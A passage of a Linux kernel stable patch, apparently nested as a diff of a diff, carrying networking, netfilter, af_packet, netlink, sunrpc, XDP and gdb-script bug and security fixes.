++		 * No point in trying to reclaim folio if it is pinned.
++		 * Furthermore we don't want to reclaim underlying fs metadata
++		 * if the folio is pinned and thus potentially modified by the
++		 * pinning process as that may upset the filesystem.
++		 */
++		if (folio_maybe_dma_pinned(folio))
++			goto activate_locked;
++
+ 		mapping = folio_mapping(folio);
+ 		if (folio_test_dirty(folio)) {
+ 			/*
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index e1bb41a443c43..07e86d03d4bae 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -365,7 +365,7 @@ static int vlan_dev_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ 	switch (cmd) {
+ 	case SIOCSHWTSTAMP:
+-		if (!net_eq(dev_net(dev), &init_net))
++		if (!net_eq(dev_net(dev), dev_net(real_dev)))
+ 			break;
+ 		fallthrough;
+ 	case SIOCGMIIPHY:
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index cd4b3a610961f..597c1f17d3889 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4972,6 +4972,9 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 			skb = alloc_skb(0, GFP_ATOMIC);
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
++
++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
++			return;
+ 	}
+ 	if (!skb)
+ 		return;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b9d7c3dd1cb39..c0fd8f5f3b94e 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -783,6 +783,7 @@ lookup:
+ 
+ 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
+ 		goto discard_and_relse;
++	nf_reset_ct(skb);
+ 
+ 	return __sk_receive_skb(sk, skb, 1, dh->dccph_doff * 4,
+ 				refcounted) ? -1 : 0;
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 922c87ef1ab58..2a07588265c70 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1570,9 +1570,19 @@ struct sk_buff *__ip_make_skb(struct sock *sk,
+ 	cork->dst = NULL;
+ 	skb_dst_set(skb, &rt->dst);
+ 
+-	if (iph->protocol == IPPROTO_ICMP)
+-		icmp_out_count(net, ((struct icmphdr *)
+-			skb_transport_header(skb))->type);
++	if (iph->protocol == IPPROTO_ICMP) {
++		u8 icmp_type;
++
++		/* For such sockets, transhdrlen is zero when do ip_append_data(),
++		 * so icmphdr does not in skb linear region and can not get icmp_type
++		 * by icmp_hdr(skb)->type.
++		 */
++		if (sk->sk_type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp_type = fl4->fl4_icmp_type;
++		else
++			icmp_type = icmp_hdr(skb)->type;
++		icmp_out_count(net, icmp_type);
++	}
+ 
+ 	ip_cork_release(cork);
+ out:
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index e1ebf5e42ebe9..d94041bb42872 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -404,10 +404,6 @@ resubmit_final:
+ 			/* Only do this once for first final protocol */
+ 			have_final = true;
+ 
+-			/* Free reference early: we don't need it any more,
+-			   and it may hold ip_conntrack module loaded
+-			   indefinitely. */
+-			nf_reset_ct(skb);
+ 
+ 			skb_postpull_rcsum(skb, skb_network_header(skb),
+ 					   skb_network_header_len(skb));
+@@ -430,10 +426,12 @@ resubmit_final:
+ 				goto discard;
+ 			}
+ 		}
+-		if (!(ipprot->flags & INET6_PROTO_NOPOLICY) &&
+-		    !xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
+-			SKB_DR_SET(reason, XFRM_POLICY);
+-			goto discard;
++		if (!(ipprot->flags & INET6_PROTO_NOPOLICY)) {
++			if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
++				SKB_DR_SET(reason, XFRM_POLICY);
++				goto discard;
++			}
++			nf_reset_ct(skb);
+ 		}
+ 
+ 		ret = INDIRECT_CALL_2(ipprot->handler, tcp_v6_rcv, udpv6_rcv,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 4fc511bdf176c..f44b99f7ecdcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -193,10 +193,8 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 			struct sk_buff *clone = skb_clone(skb, GFP_ATOMIC);
+ 
+ 			/* Not releasing hash table! */
+-			if (clone) {
+-				nf_reset_ct(clone);
++			if (clone)
+ 				rawv6_rcv(sk, clone);
+-			}
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -387,6 +385,7 @@ int rawv6_rcv(struct sock *sk, struct sk_buff *skb)
+ 		kfree_skb(skb);
+ 		return NET_RX_DROP;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (!rp->checksum)
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 81afb40bfc0bb..c563a84d67b46 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1722,6 +1722,8 @@ process:
+ 	if (drop_reason)
+ 		goto discard_and_relse;
+ 
++	nf_reset_ct(skb);
++
+ 	if (tcp_filter(sk, skb)) {
+ 		drop_reason = SKB_DROP_REASON_SOCKET_FILTER;
+ 		goto discard_and_relse;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 0b8127988adb7..c029222ce46b0 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -701,6 +701,7 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 		drop_reason = SKB_DROP_REASON_XFRM_POLICY;
+ 		goto drop;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+@@ -1024,6 +1025,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 
+ 	if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb))
+ 		goto discard;
++	nf_reset_ct(skb);
+ 
+ 	if (udp_lib_checksum_complete(skb))
+ 		goto csum_error;
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index adae86e8e02e8..8639e7efd0e22 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -384,6 +384,7 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 30ed45b1b57df..a0e9c7af08467 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -938,7 +938,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 		goto out;
+ 	}
+ 
+-	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d095d3c1ceca6..cb4325b8ebb11 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -176,7 +176,12 @@ nla_put_failure:
+ static int ctnetlink_dump_timeout(struct sk_buff *skb, const struct nf_conn *ct,
+ 				  bool skip_zero)
+ {
+-	long timeout = nf_ct_expires(ct) / HZ;
++	long timeout;
++
++	if (nf_ct_is_confirmed(ct))
++		timeout = nf_ct_expires(ct) / HZ;
++	else
++		timeout = ct->timeout / HZ;
+ 
+ 	if (skip_zero && timeout == 0)
+ 		return 0;
+@@ -2253,9 +2258,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	if (!cda[CTA_TIMEOUT])
+ 		goto err1;
+ 
+-	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
+-	__nf_ct_set_timeout(ct, timeout);
+-
+ 	rcu_read_lock();
+  	if (cda[CTA_HELP]) {
+ 		char *helpname = NULL;
+@@ -2316,6 +2318,12 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
++	/* we must add conntrack extensions before confirmation. */
++	ct->status |= IPS_CONFIRMED;
++
++	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
++	__nf_ct_set_timeout(ct, timeout);
++
+ 	if (cda[CTA_STATUS]) {
+ 		err = ctnetlink_change_status(ct, cda);
+ 		if (err < 0)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 12d815b9aa131..f663262df6987 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4936,12 +4936,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 	}
+ }
+ 
++void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	if (nft_set_is_anonymous(set))
++		nft_clear(ctx->net, set);
++
++	set->use++;
++}
++EXPORT_SYMBOL_GPL(nf_tables_activate_set);
++
+ void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
+ 			      struct nft_set_binding *binding,
+ 			      enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
+ 	case NFT_TRANS_PREPARE:
++		if (nft_set_is_anonymous(set))
++			nft_deactivate_next(ctx->net, set);
++
+ 		set->use--;
+ 		return;
+ 	case NFT_TRANS_ABORT:
+@@ -8517,6 +8529,8 @@ static int nf_tables_validate(struct net *net)
+ 			if (nft_table_validate(net, table) < 0)
+ 				return -EAGAIN;
+ 		}
++
++		nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+ 		break;
+ 	}
+ 
+@@ -9437,11 +9451,6 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 	return 0;
+ }
+ 
+-static void nf_tables_cleanup(struct net *net)
+-{
+-	nft_validate_state_update(net, NFT_VALIDATE_SKIP);
+-}
+-
+ static int nf_tables_abort(struct net *net, struct sk_buff *skb,
+ 			   enum nfnl_abort_action action)
+ {
+@@ -9475,7 +9484,6 @@ static const struct nfnetlink_subsystem nf_tables_subsys = {
+ 	.cb		= nf_tables_cb,
+ 	.commit		= nf_tables_commit,
+ 	.abort		= nf_tables_abort,
+-	.cleanup	= nf_tables_cleanup,
+ 	.valid_genid	= nf_tables_valid_genid,
+ 	.owner		= THIS_MODULE,
+ };
+diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
+index 81c7737c803a6..ae7146475d17a 100644
+--- a/net/netfilter/nfnetlink.c
++++ b/net/netfilter/nfnetlink.c
+@@ -590,8 +590,6 @@ done:
+ 			goto replay_abort;
+ 		}
+ 	}
+-	if (ss->cleanup)
+-		ss->cleanup(net);
+ 
+ 	nfnl_err_deliver(&err_list, oskb);
+ 	kfree_skb(skb);
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index 6983e6ddeef90..e65a83328b554 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_dynset *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_dynset_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index d9ad1aa818564..68a5dea805480 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_lookup *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_lookup_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
+index 5d8d91b3904db..7f8e480b6be5b 100644
+--- a/net/netfilter/nft_objref.c
++++ b/net/netfilter/nft_objref.c
+@@ -184,7 +184,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
+ {
+ 	struct nft_objref_map *priv = nft_expr_priv(expr);
+ 
+-	priv->set->use++;
++	nf_tables_activate_set(ctx, priv->set);
+ }
+ 
+ static void nft_objref_map_destroy(const struct nft_ctx *ctx,
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 99622c64081c4..b1dcc536521b6 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1731,7 +1731,8 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	int len, val, err;
++	unsigned int flag;
++	int len, val;
+ 
+ 	if (level != SOL_NETLINK)
+ 		return -ENOPROTOOPT;
+@@ -1743,39 +1744,17 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 	switch (optname) {
+ 	case NETLINK_PKTINFO:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_PKTINFO ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_PKTINFO;
+ 		break;
+ 	case NETLINK_BROADCAST_ERROR:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_BROADCAST_SEND_ERROR ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_BROADCAST_SEND_ERROR;
+ 		break;
+ 	case NETLINK_NO_ENOBUFS:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_RECV_NO_ENOBUFS ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_RECV_NO_ENOBUFS;
+ 		break;
+ 	case NETLINK_LIST_MEMBERSHIPS: {
+-		int pos, idx, shift;
++		int pos, idx, shift, err = 0;
+ 
+-		err = 0;
+ 		netlink_lock_table();
+ 		for (pos = 0; pos * 8 < nlk->ngroups; pos += sizeof(u32)) {
+ 			if (len - pos < sizeof(u32))
+@@ -1792,40 +1771,32 @@ static int netlink_getsockopt(struct socket *sock, int level, int optname,
+ 		if (put_user(ALIGN(nlk->ngroups / 8, sizeof(u32)), optlen))
+ 			err = -EFAULT;
+ 		netlink_unlock_table();
+-		break;
++		return err;
+ 	}
+ 	case NETLINK_CAP_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_CAP_ACK ? 1 : 0;
+-		if (put_user(len, optlen) ||
+-		    put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_CAP_ACK;
+ 		break;
+ 	case NETLINK_EXT_ACK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_EXT_ACK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_EXT_ACK;
+ 		break;
+ 	case NETLINK_GET_STRICT_CHK:
+-		if (len < sizeof(int))
+-			return -EINVAL;
+-		len = sizeof(int);
+-		val = nlk->flags & NETLINK_F_STRICT_CHK ? 1 : 0;
+-		if (put_user(len, optlen) || put_user(val, optval))
+-			return -EFAULT;
+-		err = 0;
++		flag = NETLINK_F_STRICT_CHK;
+ 		break;
+ 	default:
+-		err = -ENOPROTOOPT;
++		return -ENOPROTOOPT;
+ 	}
+-	return err;
++
++	if (len < sizeof(int))
++		return -EINVAL;
++
++	len = sizeof(int);
++	val = nlk->flags & flag ? 1 : 0;
++
++	if (put_user(len, optlen) ||
++	    copy_to_user(optval, &val, len))
++		return -EFAULT;
++
++	return 0;
+ }
+ 
+ static void netlink_cmsg_recv_pktinfo(struct msghdr *msg, struct sk_buff *skb)
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 1ab65f7f2a0ae..ac9335d76fb73 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -307,7 +307,8 @@ static void packet_cached_dev_reset(struct packet_sock *po)
+ 
+ static bool packet_use_direct_xmit(const struct packet_sock *po)
+ {
+-	return po->xmit == packet_direct_xmit;
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	return READ_ONCE(po->xmit) == packet_direct_xmit;
+ }
+ 
+ static u16 packet_pick_tx_queue(struct sk_buff *skb)
+@@ -2184,7 +2185,7 @@ static int packet_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll = &PACKET_SKB_CB(skb)->sa.ll;
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2459,7 +2460,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
+ 	sll->sll_hatype = dev->type;
+ 	sll->sll_protocol = skb->protocol;
+ 	sll->sll_pkttype = skb->pkt_type;
+-	if (unlikely(po->origdev))
++	if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV)))
+ 		sll->sll_ifindex = orig_dev->ifindex;
+ 	else
+ 		sll->sll_ifindex = dev->ifindex;
+@@ -2866,7 +2867,8 @@ tpacket_error:
+ 		packet_inc_pending(&po->tx_ring);
+ 
+ 		status = TP_STATUS_SEND_REQUEST;
+-		err = po->xmit(skb);
++		/* Paired with WRITE_ONCE() in packet_setsockopt() */
++		err = READ_ONCE(po->xmit)(skb);
+ 		if (unlikely(err != 0)) {
+ 			if (err > 0)
+ 				err = net_xmit_errno(err);
+@@ -3069,7 +3071,8 @@ static int packet_snd(struct socket *sock, struct msghdr *msg, size_t len)
+ 		virtio_net_hdr_set_proto(skb, &vnet_hdr);
+ 	}
+ 
+-	err = po->xmit(skb);
++	/* Paired with WRITE_ONCE() in packet_setsockopt() */
++	err = READ_ONCE(po->xmit)(skb);
+ 	if (unlikely(err != 0)) {
+ 		if (err > 0)
+ 			err = net_xmit_errno(err);
+@@ -3512,7 +3515,7 @@ static int packet_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 		memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa, copy_len);
+ 	}
+ 
+-	if (pkt_sk(sk)->auxdata) {
++	if (packet_sock_flag(pkt_sk(sk), PACKET_SOCK_AUXDATA)) {
+ 		struct tpacket_auxdata aux;
+ 
+ 		aux.tp_status = TP_STATUS_USER;
+@@ -3896,9 +3899,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->auxdata = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_AUXDATA, val);
+ 		return 0;
+ 	}
+ 	case PACKET_ORIGDEV:
+@@ -3910,9 +3911,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		lock_sock(sk);
+-		po->origdev = !!val;
+-		release_sock(sk);
++		packet_sock_flag_set(po, PACKET_SOCK_ORIGDEV, val);
+ 		return 0;
+ 	}
+ 	case PACKET_VNET_HDR:
+@@ -4006,7 +4005,8 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 			return -EFAULT;
+ 
+-		po->xmit = val ? packet_direct_xmit : dev_queue_xmit;
++		/* Paired with all lockless reads of po->xmit */
++		WRITE_ONCE(po->xmit, val ? packet_direct_xmit : dev_queue_xmit);
+ 		return 0;
+ 	}
+ 	default:
+@@ -4057,10 +4057,10 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 
+ 		break;
+ 	case PACKET_AUXDATA:
+-		val = po->auxdata;
++		val = packet_sock_flag(po, PACKET_SOCK_AUXDATA);
+ 		break;
+ 	case PACKET_ORIGDEV:
+-		val = po->origdev;
++		val = packet_sock_flag(po, PACKET_SOCK_ORIGDEV);
+ 		break;
+ 	case PACKET_VNET_HDR:
+ 		val = po->has_vnet_hdr;
+diff --git a/net/packet/diag.c b/net/packet/diag.c
+index 07812ae5ca073..d704c7bf51b20 100644
+--- a/net/packet/diag.c
++++ b/net/packet/diag.c
+@@ -23,9 +23,9 @@ static int pdiag_put_info(const struct packet_sock *po, struct sk_buff *nlskb)
+ 	pinfo.pdi_flags = 0;
+ 	if (po->running)
+ 		pinfo.pdi_flags |= PDI_RUNNING;
+-	if (po->auxdata)
++	if (packet_sock_flag(po, PACKET_SOCK_AUXDATA))
+ 		pinfo.pdi_flags |= PDI_AUXDATA;
+-	if (po->origdev)
++	if (packet_sock_flag(po, PACKET_SOCK_ORIGDEV))
+ 		pinfo.pdi_flags |= PDI_ORIGDEV;
+ 	if (po->has_vnet_hdr)
+ 		pinfo.pdi_flags |= PDI_VNETHDR;
+diff --git a/net/packet/internal.h b/net/packet/internal.h
+index 48af35b1aed25..3bae8ea7a36f5 100644
+--- a/net/packet/internal.h
++++ b/net/packet/internal.h
+@@ -116,10 +116,9 @@ struct packet_sock {
+ 	int			copy_thresh;
+ 	spinlock_t		bind_lock;
+ 	struct mutex		pg_vec_lock;
++	unsigned long		flags;
+ 	unsigned int		running;	/* bind_lock must be held */
+-	unsigned int		auxdata:1,	/* writer must hold sock lock */
+-				origdev:1,
+-				has_vnet_hdr:1,
++	unsigned int		has_vnet_hdr:1, /* writer must hold sock lock */
+ 				tp_loss:1,
+ 				tp_tx_has_off:1;
+ 	int			pressure;
+@@ -144,4 +143,25 @@ static inline struct packet_sock *pkt_sk(struct sock *sk)
+ 	return (struct packet_sock *)sk;
+ }
+ 
++enum packet_sock_flags {
++	PACKET_SOCK_ORIGDEV,
++	PACKET_SOCK_AUXDATA,
++};
++
++static inline void packet_sock_flag_set(struct packet_sock *po,
++					enum packet_sock_flags flag,
++					bool val)
++{
++	if (val)
++		set_bit(flag, &po->flags);
++	else
++		clear_bit(flag, &po->flags);
++}
++
++static inline bool packet_sock_flag(const struct packet_sock *po,
++				    enum packet_sock_flags flag)
++{
++	return test_bit(flag, &po->flags);
++}
++
+ #endif
+diff --git a/net/sched/sch_fq.c b/net/sched/sch_fq.c
+index 48d14fb90ba02..f59a2cb2c803d 100644
+--- a/net/sched/sch_fq.c
++++ b/net/sched/sch_fq.c
+@@ -779,13 +779,17 @@ static int fq_resize(struct Qdisc *sch, u32 log)
+ 	return 0;
+ }
+ 
++static struct netlink_range_validation iq_range = {
++	.max = INT_MAX,
++};
++
+ static const struct nla_policy fq_policy[TCA_FQ_MAX + 1] = {
+ 	[TCA_FQ_UNSPEC]			= { .strict_start_type = TCA_FQ_TIMER_SLACK },
+ 
+ 	[TCA_FQ_PLIMIT]			= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_PLIMIT]		= { .type = NLA_U32 },
+ 	[TCA_FQ_QUANTUM]		= { .type = NLA_U32 },
+-	[TCA_FQ_INITIAL_QUANTUM]	= { .type = NLA_U32 },
++	[TCA_FQ_INITIAL_QUANTUM]	= NLA_POLICY_FULL_RANGE(NLA_U32, &iq_range),
+ 	[TCA_FQ_RATE_ENABLE]		= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_DEFAULT_RATE]	= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_MAX_RATE]		= { .type = NLA_U32 },
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index fd7e1c630493e..d2ee566343083 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2050,9 +2050,6 @@ call_bind_status(struct rpc_task *task)
+ 			status = -EOPNOTSUPP;
+ 			break;
+ 		}
+-		if (task->tk_rebind_retry == 0)
+-			break;
+-		task->tk_rebind_retry--;
+ 		rpc_delay(task, 3*HZ);
+ 		goto retry_timeout;
+ 	case -ENOBUFS:
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index be587a308e05a..c8321de341eea 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -817,7 +817,6 @@ rpc_init_task_statistics(struct rpc_task *task)
+ 	/* Initialize retry counters */
+ 	task->tk_garb_retry = 2;
+ 	task->tk_cred_retry = 2;
+-	task->tk_rebind_retry = 2;
+ 
+ 	/* starting timestamp */
+ 	task->tk_start = ktime_get();
+diff --git a/net/xdp/xsk_queue.h b/net/xdp/xsk_queue.h
+index c6fb6b7636582..bdeba20aaf8ff 100644
+--- a/net/xdp/xsk_queue.h
++++ b/net/xdp/xsk_queue.h
+@@ -161,6 +161,7 @@ static inline bool xp_unaligned_validate_desc(struct xsk_buff_pool *pool,
+ 		return false;
+ 
+ 	if (base_addr >= pool->addrs_cnt || addr >= pool->addrs_cnt ||
++	    addr + desc->len > pool->addrs_cnt ||
+ 	    xp_desc_crosses_non_contig_pg(pool, addr, desc->len))
+ 		return false;
+ 
+diff --git a/scripts/gdb/linux/clk.py b/scripts/gdb/linux/clk.py
+index 061aecfa294e6..7a01fdc3e8446 100644
+--- a/scripts/gdb/linux/clk.py
++++ b/scripts/gdb/linux/clk.py
+@@ -41,6 +41,8 @@ are cached and potentially out of date"""
+             self.show_subtree(child, level + 1)
+ 
+     def invoke(self, arg, from_tty):
++        if utils.gdb_eval_or_none("clk_root_list") is None:
++            raise gdb.GdbError("No clocks registered")
+         gdb.write("                                 enable  prepare  protect               \n")
+         gdb.write("   clock                          count    count    count        rate   \n")
+         gdb.write("------------------------------------------------------------------------\n")
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 2efbec6b6b8db..08f0587d15ea1 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -39,6 +39,8 @@
+ 
+ import gdb
+ 
++LX_CONFIG(CONFIG_DEBUG_INFO_REDUCED)
++
+ /* linux/clk-provider.h */
+ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+diff --git a/scripts/gdb/linux/genpd.py b/scripts/gdb/linux/genpd.py
+index 39cd1abd85590..b53649c0a77a6 100644
+--- a/scripts/gdb/linux/genpd.py
++++ b/scripts/gdb/linux/genpd.py
+@@ -5,7 +5,7 @@
+ import gdb
+ import sys
+ 
+-from linux.utils import CachedType
++from linux.utils import CachedType, gdb_eval_or_none
+ from linux.lists import list_for_each_entry
+ 
+ generic_pm_domain_type = CachedType('struct generic_pm_domain')
+@@ -70,6 +70,8 @@ Output is similar to /sys/kernel/debug/pm_genpd/pm_genpd_summary'''
+             gdb.write('    %-50s  %s\n' % (kobj_path, rtpm_status_str(dev)))
+ 
+     def invoke(self, arg, from_tty):
++        if gdb_eval_or_none("&gpd_list") is None:
++            raise gdb.GdbError("No power domain(s) registered")
+         gdb.write('domain                          status          children\n');
+         gdb.write('    /device                                             runtime status\n');
+         gdb.write('----------------------------------------------------------------------\n');
+diff --git a/scripts/gdb/linux/timerlist.py b/scripts/gdb/linux/timerlist.py
+index 071d0dd5a6349..51def847f1ef9 100644
+--- a/scripts/gdb/linux/timerlist.py
++++ b/scripts/gdb/linux/timerlist.py
+@@ -73,7 +73,7 @@ def print_cpu(hrtimer_bases, cpu, max_clock_bases):
+     ts = cpus.per_cpu(tick_sched_ptr, cpu)
+ 
+     text = "cpu: {}\n".format(cpu)
+-    for i in xrange(max_clock_bases):
++    for i in range(max_clock_bases):
+         text += " clock {}:\n".format(i)
+         text += print_base(cpu_base['clock_base'][i])
+ 
+@@ -158,6 +158,8 @@ def pr_cpumask(mask):
+     num_bytes = (nr_cpu_ids + 7) / 8
+     buf = utils.read_memoryview(inf, bits, num_bytes).tobytes()
+     buf = binascii.b2a_hex(buf)
++    if type(buf) is not str:
++        buf=buf.decode()
+ 
+     chunks = []
+     i = num_bytes
+diff --git a/scripts/gdb/linux/utils.py b/scripts/gdb/linux/utils.py
+index 1553f68716cc2..7f36aee32ac66 100644
+--- a/scripts/gdb/linux/utils.py
++++ b/scripts/gdb/linux/utils.py
+@@ -88,7 +88,10 @@ def get_target_endianness():
+ 
+ 
+ def read_memoryview(inf, start, length):
+-    return memoryview(inf.read_memory(start, length))
++    m = inf.read_memory(start, length)
++    if type(m) is memoryview:
++        return m
++    return memoryview(m)
+ 
